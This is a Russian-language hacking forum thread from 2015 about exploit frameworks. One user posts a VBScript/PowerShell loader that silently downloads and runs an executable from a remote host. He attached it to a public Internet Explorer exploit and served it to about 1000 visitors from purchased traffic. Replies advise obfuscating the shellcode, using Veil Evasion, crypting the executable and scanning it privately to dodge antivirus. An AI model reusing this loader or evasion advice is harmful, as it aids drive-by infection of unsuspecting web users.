ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

15.12.2015, 00:01
|
|
Постоянный
Регистрация: 13.06.2015
Сообщений: 359
Провел на форуме: 137330
Репутация:
7
|
|
А это не база с exploit-db?
|
|
|

15.12.2015, 00:07
|
|
Познающий
Регистрация: 08.11.2015
Сообщений: 31
Провел на форуме: 11327
Репутация:
0
|
|
Сообщение от rct
↑
А это не база с exploit-db?
это вроди как фреймворк типа метасплоит, где нужно самому подбирать експлоиты и писать ротатор. с метасплоитом у меня не получилось вообще, такое впечатление что сплоиты в его составе устаревшие и не работают сейчас
|
|
|

15.12.2015, 00:35
|
|
Постоянный
Регистрация: 13.06.2015
Сообщений: 359
Провел на форуме: 137330
Репутация:
7
|
|
Сообщение от san-ok
↑
это вроди как фреймворк типа метасплоит, где нужно самому подбирать експлоиты и писать ротатор. с метасплоитом у меня не получилось вообще, такое впечатление что сплоиты в его составе устаревшие и не работают сейчас
Просто показалось что оно на https://github.com/offensive-securit...se-bin-sploits построено.
|
|
|

15.12.2015, 01:10
|
|
Познающий
Регистрация: 08.11.2015
Сообщений: 31
Провел на форуме: 11327
Репутация:
0
|
|
Еще вопрос, подскажите кто спец.
Кроме MSF я отдельно тестировал вот этот сплоит: https://www.exploit-db.com/exploits/35229/
К нему я прикрепил вот такой загрузчик:
set shell=createobject("Shell.Application")
shell.ShellExecute "PowerShell.exe", "-WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(' http://mysite.com/download/mysoft.exe','mysoft.exe');Start-Process 'mysoft.exe'", "", "open", 1
При тестировании работало обалденно, пробивает мою 7-ю винду с IE 11, тестировал через crossbrowsertesting сервис - успешно пробивало IE 11, IE 9 на Win Vista и Win 7.
Но, когда купил IE траф отсюда: redirect.com - то где-то 1000 просмотров пустил, и ни одной загрузки...вот почему....что не так..
Подскажите плз...или с трафом тем что-то не так...тогда где его брать..
|
|
|

15.12.2015, 01:28
|
|
Постоянный
Регистрация: 13.06.2015
Сообщений: 359
Провел на форуме: 137330
Репутация:
7
|
|
Антивири очень строго относятся к схеме загрузил mysoft.exe => сразу запустил mysoft.exe Тем более ты скачиваешь стандартными утилитами винды. Ну это моё мнение.
|
|
|

15.12.2015, 01:53
|
|
Познающий
Регистрация: 08.11.2015
Сообщений: 31
Провел на форуме: 11327
Репутация:
0
|
|
Вопрос: какие Payloads в метасплоите более пробиваемы? Реверс-шелы или модуль download_exec?
Если например взять какой-то реверс-шел и просто получить доступ к компам. А уже потом как-то дать всем команду грузить exe. Наверное это был бы более правильный способ чем сразу exe запускать?
|
|
|

15.12.2015, 02:03
|
|
Участник форума
Регистрация: 19.05.2015
Сообщений: 117
Провел на форуме: 25535
Репутация:
22
|
|
Сообщение от san-ok
↑
Вопрос: какие Payloads в метасплоите более пробиваемы? Реверс-шелы или модуль download_exec?
Если например взять какой-то реверс-шел и просто получить доступ к компам. А уже потом как-то дать всем команду грузить exe. Наверное это был бы более правильный способ чем сразу exe запускать?
да так не делаются дела,обычно под это дело приватный софт пишут
|
|
|

15.12.2015, 10:23
|
|
Познающий
Регистрация: 12.07.2015
Сообщений: 65
Провел на форуме: 13323
Репутация:
0
|
|
Сообщение от san-ok
↑
Еще вопрос, подскажите кто спец.
Кроме MSF я отдельно тестировал вот этот сплоит:
https://www.exploit-db.com/exploits/35229/
К нему я прикрепил вот такой загрузчик:
set shell=createobject("Shell.Application")
shell.ShellExecute "PowerShell.exe", "-WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('
http://mysite.com/download/mysoft.exe','mysoft.exe');Start-Process
'mysoft.exe'", "", "open", 1
При тестировании работало обалденно, пробивает мою 7-ю винду с IE 11, тестировал через crossbrowsertesting сервис - успешно пробивало IE 11, IE 9 на Win Vista и Win 7.
Но, когда купил IE траф отсюда: redirect.com - то где-то 1000 просмотров пустил, и ни одной загрузки...вот почему....что не так..
Подскажите плз...или с трафом тем что-то не так...тогда где его брать..
Почисти шеллкод, обфусцируй его, наполни мусором, метасплоит умеет генерировать разный мусор, еще посмотри в сторону Veil Evasion фреймворк он в купе с метасплоитом работает. да и еще .exe свой тоже криптони и проверь на сервисе каком нибудь, только не вирустототал!
|
|
|

15.12.2015, 13:33
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме: 216062
Репутация:
231
|
|
Сообщение от rct
↑
А это не база с exploit-db?
не,у меня такое ощущение что авторы как раз с метасплойта их и собирают)
Если по теме уязвимостей и метасплойта то вот хороший китайский сайт http://www.metasploit.cn/forum.php
Через гугл переводчик
|
|
|

15.12.2015, 13:49
|
|
Постоянный
Регистрация: 13.06.2015
Сообщений: 359
Провел на форуме: 137330
Репутация:
7
|
|
Сообщение от grimnir
↑
не,у меня такое ощущение что авторы как раз с метасплойта их и собирают)
Если по теме уязвимостей и метасплойта то вот хороший китайский сайт
http://www.metasploit.cn/forum.php
Через гугл переводчик
Ясно) Оно хоть обновляется? На сайте битые ссылки, запустил ExploitPack.jar, просит обновиться до 5.01
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|